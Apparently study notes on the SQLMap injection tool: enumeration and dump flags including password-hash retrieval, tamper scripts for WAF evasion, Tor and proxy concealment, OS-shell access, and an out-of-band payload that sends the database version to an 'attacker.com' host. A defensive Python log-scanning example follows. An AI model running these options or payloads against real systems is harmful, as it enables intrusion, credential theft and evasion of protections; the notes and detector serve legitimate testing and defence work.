SQLMap

SQLMap can use JSON and XML in request bodies as well.

  Target connection
  Injection detection
  Fingerprinting
  Protection detection and bypass using "tamper" scripts
  Database content retrieval
  Execution of operating system (OS) commands

Installation
  $ sudo apt install sqlmap
  $ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
  $ python sqlmap.py   # if installed via the git clone above
Injection Types

Out-of-band (not sure of the syntax):
  LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))

--batch skips any required user input (the default answer is taken for every prompt)
Using a full request

Custom requests
  --referer, --host, -A/--user-agent, --method
  --random-agent to randomize the User-Agent
  --mobile to imitate a mobile browser
Prefix and Suffix

--risk sets how risky the payloads may be (higher risk can cause problems or a DoS on the target)
--level widens the set of payloads and boundaries tested (higher level includes payloads with a lower expectation of success)
--level=1 --risk=1 is 72 payloads while --level=5 --risk=3 is 7865
--code=200 to treat HTTP 200 responses as "true"
--titles to compare pages by their <title>
--string=success to treat responses containing "success" as "true"
--text-only to compare visible text content only
--technique=BEU (boolean, error, union)
--union-cols=17
--union-char='a' this will use union select 'a','a','a'
--union-from=users if the query requires a FROM clause, as in Oracle
Database Enumeration
  --banner gets the DBMS version banner
  --current-user gets the current user
  --current-db gets the current database (database())
  --is-dba checks for DBA (admin) rights
  --dump-format html/csv
  -C username,password to retrieve specific columns
  --start=2 --stop=3 to retrieve rows 2-3
  --where="name LIKE 'f%'" for conditional enumeration
  --dump dumps the currently specified table (or the whole db if no -T is given)
  --dump-all dumps all content from all dbs
  --schema gives a complete overview of the db structure
  --search -T user searches for tables whose name matches "user"
  --search -C pass searches for columns whose name matches "pass"
  --passwords dumps DBMS user password hashes (stored in system tables such as mysql.user)
  --all --batch does everything automatically
Bypassing Web Application Protections

Anti-CSRF Token Bypass
Unique Value Bypass
Calculated Parameter Bypass

IP Address Concealing
  --proxy="socks4://177.39.187.70:33283"
  --proxy-file to supply a list of proxies
  --tor to route traffic through Tor
  --check-tor to check that Tor is properly set up
  --skip-waf to skip the WAF heuristic checks

User-Agent Blacklisting Bypass
  --random-agent
Tamper scripts (what each one does)
  Replaces instances of UNION with e0UNION
  Base64-encodes all characters in a given payload
  Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #
  Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart
  Replaces all occurrences of operator equal (=) with LIKE counterpart
  halfversionedmorekeywords: Adds (MySQL) versioned comment before each keyword
  Embraces complete query with (MySQL) versioned comment
  Embraces complete query with (MySQL) zero-versioned comment
  Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
  Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart
  Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
  Replaces space character ( ) with comments /**/
  Replaces space character ( ) with a dash comment (--) followed by a random string and a new line (\n)
  Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line (\n)
  Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters
  Replaces space character ( ) with plus (+)
  Replaces space character ( ) with a random blank character from a valid set of alternate characters
  Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
  Encloses each non-function keyword with (MySQL) versioned comment
  Encloses each keyword with (MySQL) versioned comment
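Added example (not from these notes or the sqlmap project): a small Python check that undoes the transformations listed above before keyword matching, so comment-for-space, random case, versioned comments, percent-prefixing and plus-for-space do not hide a payload from a log review. The access-log lines and the sqlmap User-Agent string are constructed, and the log format is assumed to be a combined access log.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): a benign request, a request
# carrying sqlmap's default User-Agent, and two payloads obfuscated the way the
# space2comment, randomcase, versionedkeywords, percentage and space2plus tampers do.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=42%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=42/**/uNiOn/*!SeLeCt*/1,2,3 HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=42+%U%N%I%O%N+%S%E%L%E%C%T+1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"')
# Keyword shapes checked on the de-obfuscated, lower-cased request target.
SQLI_RE = re.compile(r"union\s+(all\s+)?select|\bselect\b.*\bfrom\b|\bsleep\s*\(|"
                     r"\b(and|or)\s+\d+\s*=\s*\d+|information_schema")

def normalize(target):
    """Undo the tamper transformations listed above so plain keyword matching works again."""
    s = unquote(target)                                      # %20 and other URL escapes
    s = re.sub(r"%([A-Za-z])", r"\1", s)                     # percentage: %S%E%L%E%C%T -> SELECT
    s = s.replace("+", " ")                                  # space2plus
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)   # versioned comments: keep the keyword inside
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # space2comment: /**/ -> space
    s = re.sub(r"(--|#)[^\n]*\n", " ", s)                    # space2dash / space2hash
    s = re.sub(r"\s+", " ", s).strip()                       # alternate blank characters -> one space
    return s.lower()                                         # randomcase

def analyze(line):
    """Return None for unparsable lines, else a dict with the reasons the request looks suspicious."""
    m = LOG_RE.search(line)
    if not m:
        return None
    reasons = []
    if m.group("ua").lower().startswith("sqlmap"):
        reasons.append("default sqlmap User-Agent")
    normalized = normalize(m.group("path"))
    if SQLI_RE.search(normalized):
        reasons.append("SQL keywords after de-obfuscation")
    return {"path": m.group("path"), "normalized": normalized, "reasons": reasons}

def flag_suspicious(lines):
    """Keep only the parsed requests that triggered at least one reason."""
    return [r for r in (analyze(l) for l in lines) if r and r["reasons"]]

if __name__ == "__main__":
    for hit in flag_suspicious(SAMPLE_LOG):
        print(hit["path"], "->", hit["normalized"], hit["reasons"])
```

The benign first line is not flagged; the other three are, and the normalized form shows the plain UNION SELECT that the obfuscation was meant to hide.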
Miscellaneous Bypass
  --chunked to split the POST request body (chunked transfer encoding)

Reading Files and RCE
  Note: with --os-shell, try different --technique values if applicable